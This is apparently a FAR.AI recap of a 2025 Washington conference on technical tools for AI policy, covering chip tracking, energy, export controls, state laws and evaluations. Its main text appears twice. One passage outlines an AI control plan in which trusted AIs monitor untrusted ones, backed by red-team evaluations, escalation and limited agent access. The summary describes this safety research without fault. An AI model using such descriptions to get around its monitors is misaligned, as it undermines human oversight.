Technical Innovations for AI Policy 2025

July 10, 2025
Summary
The inaugural Technical Innovations for AI Policy Conference in Washington D.C. convened technical experts, researchers, and policymakers to discuss how innovations—like chip-tracking devices and secure evaluation facilities—can enable both AI progress and safety.
In April, over 150 technical experts, researchers, and policymakers gathered in Washington, D.C. to discuss the technical foundations of AI governance.
Participants explored technological solutions to address emerging AI policy issues, including growing energy demands, competition with China, safety evaluations, and the need for formally verifiable commitments.

Beyond the Binary: Achieving Progress and Safety
“I often see debates around AI policy framed as this dichotomy between innovation…and safety…but I believe that through technical innovation we can overcome this binary choice.”
— Adam Gleave (FAR.AI)
In his opening remarks, FAR.AI’s CEO Adam Gleave highlighted historical precedents where technology helped policymakers to solve seemingly intractable problems without sacrificing progress, offering a blueprint for AI governance.
Key Uncertainties
Helen Toner (Center for Security and Emerging Technology) attributed contradictory reports on AI progress to three “Unresolved Debates on the Future of AI”:
- Will the current AI paradigm keep delivering breakthroughs?
- How much can AI systems be used to improve AI systems?
- Will AI remain a tool we control?
Toner’s framework breaks down the key considerations to help navigate AI’s trajectory. Find out more in her blogpost.
Likewise, Brad Carson (Americans for Responsible Innovation) shared his main unanswered AI policy questions with tentative answers:
- Can America generate the power required to support domestic AI data centers?
- Will AI truly revolutionize warfare or merely deliver incremental improvements?
- Is the policy world's fixation on generative AI causing us to neglect the more immediate harms from the predictive algorithms embedded in daily life?

Creative Solutions
Using mixed methods for effective governance: Miranda Bogen (Center for Democracy and Technology) cautioned against unclear terminology and vague goals in AI governance. Auditing—which entails hundreds of different efforts—offers a prime example of the need for a comprehensive ecosystem with various approaches, independent oversight, and specific metrics to meet concrete goals.
Developing backup plans for AI control in the event of misalignment: Mary Phuong (Google DeepMind) argued that we should operate under the assumption that AIs will work against us. She also projects that by 2027, AI agents will be able to run autonomous tasks that would take humans a week. In the event that scalable human monitoring of AI becomes impossible, Phuong’s Plan B for AI control is a multi-layered defense system whereby trusted AIs watch untrusted ones with red-team evaluations, escalation processes, and robust system designs that limit agent access. While Phuong sees this as our most promising near-term safety approach, she warns it is a stopgap measure and that there is a need for broader solutions.
Bridging the gap between Silicon Valley and Capitol Hill
“I hope that today this divide can end. That we can bury the hatchet and forge a new alliance between innovation and American values between acceleration and altruism that will shape not just our nation’s fate but potentially the fate of humanity.”
— Mark Beall (AI Policy Network)
A framework for collaboration: Ben Bucknall (University of Oxford) presented a framework of technical AI governance to bridge the technical-policy divide. Using information deficits as an example, Buknall showed how governance problems can be broken down to arrive at concrete open problems that benefit from technical expertise.
AI as a national security issue: In “Department of Defense & AGI Preparedness,” Mark Beall (AI Policy Network) argued that artificial general intelligence represents the defining challenge of our era. With potentially only three years to act, he proposes a three-pronged strategy:
- Protect through export controls, deterrence mechanisms, contingency plans for attacks, and government investment in infrastructure strengthening and alignment research.
- Promote AI development by eliminating bureaucratic bottlenecks, ensuring Western powers do not lose AGI leadership to authoritarian control.
- Prepare through rapid increased industry-government collaboration, testing and evaluation programs, and diplomacy with China to prevent mutual destruction.
Congress: U.S. Representative Bill Foster proposed the following congressional priorities:
- Secure digital IDs for all Americans to combat AI-driven fraud and identity theft
- Location verification for cutting-edge AI chips to enforce export controls and safeguard democratic nations’ control of the supply chain
- Hardware-enforced licensing that requires periodic renewals to prevent chip shut-down
State legislation: New York State Senator Alex Bores, who is expecting his first child, opened his talk by remarking on how technological developments are so rapid that “with AI, sometimes the world changes completely even during a pregnancy.” Bores argued that state legislatures’ nimbleness makes them well positioned to address emerging AI challenges. His RAISE Act— requiring safety plans and third-party audits for big AI companies—has already passed both legislative chambers in New York.
The importance of technical expertise: Lennart Heim (RAND Corporation) opened the second day of the conference by reflecting on how technologists can contribute to AI policy:
- Understanding AI fundamentals: tracking training energy requirements, benchmarking capabilities, and mapping supercomputer ownership trends
- Strategic assessments: analyzing the implications of China’s energy deployment and comparing global chip production capabilities
- Verification: developing the technical tools necessary to enforce AI policy agreements

Lightning talks
AI infrastructure, national security, and the policy relevance of technical work:
- Steve Kelly (Institute for Security and Technology) on AI's national security implications.
- Arnab Datta (Institute for Progress) on permitting for secure AI data centers.
- Charles Yang (Center for Industrial Strategy) on hydropower for AI's energy demands.
- Sarah Cen (Stanford University) on the connections between companies in the AI supply chain.
- Kevin Wei (RAND Corporation) on policy-relevant AI evaluations.
Open-source, policy instruments, and model evaluations:
- Sara McNaughton (Beacon Global Strategies) on chip export controls implementation.
- Irene Solaiman (Hugging Face) on accessibility as a determinant for AI system adoption.
- Asad Ramzanali (Vanderbilt Policy Accelerator) on treating AI’s standard technological problems like antitrust.
- Robert Trager (Oxford Martin AI Governance Initiative) on internal and external verification systems.
Cryptographic security, spending trends, and misuse threats:
- Daniel Kang (University of Illinois Urbana-Champaign) on CVE-Bench, the first benchmark for AI agents in cybersecurity.
- Onni Aarne (Institute for AI Policy and Strategy) on hardware-enabled verifiability.
- Hamza Chaudhry (Future of Life Institute) on structural factors for driving US military AI spending.
- Ben Cottier (Epoch AI) on the challenge of costly upfront evaluations for soon-to-be cheap AI.
- Tina Morrison (EQTY Lab) on embedding tamper-proof certificates into chips.
- Fatemeh Ganji (Worcester Polytechnic Institute) on effective ways to protect AI accelerators from attacks.
- Olivia Shoemaker (Frontier Design) on how operational factors may overshadow model capabilities.

Looking Ahead
While governing AI faces daunting obstacles like energy limitations, safety assessments, and international conflicts, this conference demonstrated that viable technical solutions are within reach. Innovations like chip-tracking systems and verification protocols are transitioning from conceptual ideas to practical implementations. To watch the full recordings, please visit the event website or YouTube playlist.
Even as this field has grown in recent years, it remains underdeveloped. Want to be considered for upcoming discussions? Submit your interest in future FAR.AI events.
FAR.AI organized this nonpartisan event in collaboration with the Foundation for American Innovation (FAI), the Center for a New American Security (CNAS), and the RAND Corporation.
This is a div block with a Webflow interaction that will be triggered when the heading is in the view.
In April, over 150 technical experts, researchers, and policymakers gathered in Washington, D.C. to discuss the technical foundations of AI governance.
Participants explored technological solutions to address emerging AI policy issues, including growing energy demands, competition with China, safety evaluations, and the need for formally verifiable commitments.

Beyond the Binary: Achieving Progress and Safety
“I often see debates around AI policy framed as this dichotomy between innovation…and safety…but I believe that through technical innovation we can overcome this binary choice.”
— Adam Gleave (FAR.AI)
In his opening remarks, FAR.AI’s CEO Adam Gleave highlighted historical precedents where technology helped policymakers to solve seemingly intractable problems without sacrificing progress, offering a blueprint for AI governance.
Key Uncertainties
Helen Toner (Center for Security and Emerging Technology) attributed contradictory reports on AI progress to three “Unresolved Debates on the Future of AI”:
- Will the current AI paradigm keep delivering breakthroughs?
- How much can AI systems be used to improve AI systems?
- Will AI remain a tool we control?
Toner’s framework breaks down the key considerations to help navigate AI’s trajectory. Find out more in her blogpost.
Likewise, Brad Carson (Americans for Responsible Innovation) shared his main unanswered AI policy questions with tentative answers:
- Can America generate the power required to support domestic AI data centers?
- Will AI truly revolutionize warfare or merely deliver incremental improvements?
- Is the policy world's fixation on generative AI causing us to neglect the more immediate harms from the predictive algorithms embedded in daily life?

Creative Solutions
Using mixed methods for effective governance: Miranda Bogen (Center for Democracy and Technology) cautioned against unclear terminology and vague goals in AI governance. Auditing—which entails hundreds of different efforts—offers a prime example of the need for a comprehensive ecosystem with various approaches, independent oversight, and specific metrics to meet concrete goals.
Developing backup plans for AI control in the event of misalignment: Mary Phuong (Google DeepMind) argued that we should operate under the assumption that AIs will work against us. She also projects that by 2027, AI agents will be able to run autonomous tasks that would take humans a week. In the event that scalable human monitoring of AI becomes impossible, Phuong’s Plan B for AI control is a multi-layered defense system whereby trusted AIs watch untrusted ones with red-team evaluations, escalation processes, and robust system designs that limit agent access. While Phuong sees this as our most promising near-term safety approach, she warns it is a stopgap measure and that there is a need for broader solutions.
Bridging the gap between Silicon Valley and Capitol Hill
“I hope that today this divide can end. That we can bury the hatchet and forge a new alliance between innovation and American values between acceleration and altruism that will shape not just our nation’s fate but potentially the fate of humanity.”
— Mark Beall (AI Policy Network)
A framework for collaboration: Ben Bucknall (University of Oxford) presented a framework of technical AI governance to bridge the technical-policy divide. Using information deficits as an example, Buknall showed how governance problems can be broken down to arrive at concrete open problems that benefit from technical expertise.
AI as a national security issue: In “Department of Defense & AGI Preparedness,” Mark Beall (AI Policy Network) argued that artificial general intelligence represents the defining challenge of our era. With potentially only three years to act, he proposes a three-pronged strategy:
- Protect through export controls, deterrence mechanisms, contingency plans for attacks, and government investment in infrastructure strengthening and alignment research.
- Promote AI development by eliminating bureaucratic bottlenecks, ensuring Western powers do not lose AGI leadership to authoritarian control.
- Prepare through rapid increased industry-government collaboration, testing and evaluation programs, and diplomacy with China to prevent mutual destruction.
Congress: U.S. Representative Bill Foster proposed the following congressional priorities:
- Secure digital IDs for all Americans to combat AI-driven fraud and identity theft
- Location verification for cutting-edge AI chips to enforce export controls and safeguard democratic nations’ control of the supply chain
- Hardware-enforced licensing that requires periodic renewals to prevent chip shut-down
State legislation: New York State Senator Alex Bores, who is expecting his first child, opened his talk by remarking on how technological developments are so rapid that “with AI, sometimes the world changes completely even during a pregnancy.” Bores argued that state legislatures’ nimbleness makes them well positioned to address emerging AI challenges. His RAISE Act— requiring safety plans and third-party audits for big AI companies—has already passed both legislative chambers in New York.
The importance of technical expertise: Lennart Heim (RAND Corporation) opened the second day of the conference by reflecting on how technologists can contribute to AI policy:
- Understanding AI fundamentals: tracking training energy requirements, benchmarking capabilities, and mapping supercomputer ownership trends
- Strategic assessments: analyzing the implications of China’s energy deployment and comparing global chip production capabilities
- Verification: developing the technical tools necessary to enforce AI policy agreements

Lightning talks
AI infrastructure, national security, and the policy relevance of technical work:
- Steve Kelly (Institute for Security and Technology) on AI's national security implications.
- Arnab Datta (Institute for Progress) on permitting for secure AI data centers.
- Charles Yang (Center for Industrial Strategy) on hydropower for AI's energy demands.
- Sarah Cen (Stanford University) on the connections between companies in the AI supply chain.
- Kevin Wei (RAND Corporation) on policy-relevant AI evaluations.
Open-source, policy instruments, and model evaluations:
- Sara McNaughton (Beacon Global Strategies) on chip export controls implementation.
- Irene Solaiman (Hugging Face) on accessibility as a determinant for AI system adoption.
- Asad Ramzanali (Vanderbilt Policy Accelerator) on treating AI’s standard technological problems like antitrust.
- Robert Trager (Oxford Martin AI Governance Initiative) on internal and external verification systems.
Cryptographic security, spending trends, and misuse threats:
- Daniel Kang (University of Illinois Urbana-Champaign) on CVE-Bench, the first benchmark for AI agents in cybersecurity.
- Onni Aarne (Institute for AI Policy and Strategy) on hardware-enabled verifiability.
- Hamza Chaudhry (Future of Life Institute) on structural factors for driving US military AI spending.
- Ben Cottier (Epoch AI) on the challenge of costly upfront evaluations for soon-to-be cheap AI.
- Tina Morrison (EQTY Lab) on embedding tamper-proof certificates into chips.
- Fatemeh Ganji (Worcester Polytechnic Institute) on effective ways to protect AI accelerators from attacks.
- Olivia Shoemaker (Frontier Design) on how operational factors may overshadow model capabilities.

Looking Ahead
While governing AI faces daunting obstacles like energy limitations, safety assessments, and international conflicts, this conference demonstrated that viable technical solutions are within reach. Innovations like chip-tracking systems and verification protocols are transitioning from conceptual ideas to practical implementations. To watch the full recordings, please visit the event website or YouTube playlist.
Even as this field has grown in recent years, it remains underdeveloped. Want to be considered for upcoming discussions? Submit your interest in future FAR.AI events.
FAR.AI organized this nonpartisan event in collaboration with the Foundation for American Innovation (FAI), the Center for a New American Security (CNAS), and the RAND Corporation.